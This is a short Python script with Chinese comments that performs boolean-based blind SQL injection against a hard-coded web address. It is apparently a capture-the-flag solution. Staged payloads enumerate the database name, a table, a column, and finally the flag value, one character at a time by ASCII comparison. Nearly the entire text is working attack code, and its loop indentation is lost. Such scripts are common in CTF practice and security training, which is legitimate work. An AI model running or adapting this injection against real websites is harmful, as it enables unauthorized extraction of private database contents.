盲注脚本
# -*- coding:utf-8 -*-
import requests
import re
url = "http://123.206.87.240:8002/chengjidan/index.php"
#if(prep1,prep2,prep3) 若表达式prep1为真,则返回prep2,若prep1为假,则返回prep3
base_payload = "1' and if(ascii(substr({data},{len},1))>{number},1,0)#"
#base_payload = "1' and if(ascii(substr(select table_name from information_schema.tables where table_name=database() limit 0,1)>{num},{len},1),1,0)
#payload = "database()" #爆库:skctf_flag
#payload = "(select table_name from information_schema.tables where table_schema=database() limit 0,1)" #爆表:fl4g
#payload = "(select column_name from information_schema.columns where table_name='fl4g' limit 0,1)" #爆列名:skctf_flag
payload = "(select skctf_flag from fl4g limit 0,1)"#爆数据
information=""
for m in range(1,50):#假设数据最多有50个。substr(x,50,1)
for i in range(32,129):#字符的ascll码范围
post_data = {"id":base_payload.format(data = payload,len = m,number=i)}
r = requests.post(url,post_data)
resultarr = re.findall(r"<td>(.+?)<td>",r.text)
result = ''.join(resultarr)
if '60' not in result:
information += chr(i)
break
print information